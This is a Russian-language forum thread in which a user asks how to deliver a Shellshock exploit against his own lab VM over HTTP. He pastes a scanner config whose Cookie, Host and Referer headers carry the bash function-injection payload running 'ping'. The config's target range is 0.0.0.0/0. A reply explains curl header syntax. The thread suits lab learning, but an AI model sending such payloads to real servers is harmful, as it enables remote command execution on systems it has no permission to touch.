LINUX.ORG.RU

Выполнение HTTP-запроса

 ,


0

2

Уважаемые форумчане, помогите. Хочу проэксплуатировать уязвимость shellshock. На виртуалке (с IP-адресом 192.168.1.1) я развернул ОС с этой уязвимостью, и веб-сервер. Как мне выполнить нижеприведенный скрипт с хостовой системы (c IP адресом 192.168.1.2), что бы он был как HTTP-запрос ?

target = 0.0.0.0/0

port = 80

banners = true

http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)

http-header = Cookie:() { :; }; ping -c 3 192.168.1.2

http-header = Host:() { :; }; ping -c 3 192.168.1.2

http-header = Referer:() { :; }; ping -c 3 192.168.1.2



Последнее исправление: sa1mon (всего исправлений: 2)

Ну заголовки можно послать тем же curl'ом. Скрипта в посте я не увидел, так что ничего сказать не могу.

alozovskoy ★★★★★
()
Ответ на: комментарий от alozovskoy

Как curl'ом это сделать ? ping -c 3 192.168.1.2 - это и есть та самая команда, которая должна выполнится на уязвимой системе

sa1mon
() автор топика
Ответ на: комментарий от sa1mon

Хэдеры шлются вот так (и это с первой ссылке, выданной гуглом по «curl header», не говоря уж о том что можно было и в мане посмотреть).

curl --header "X-MyHeader: 123" www.google.com
alozovskoy ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.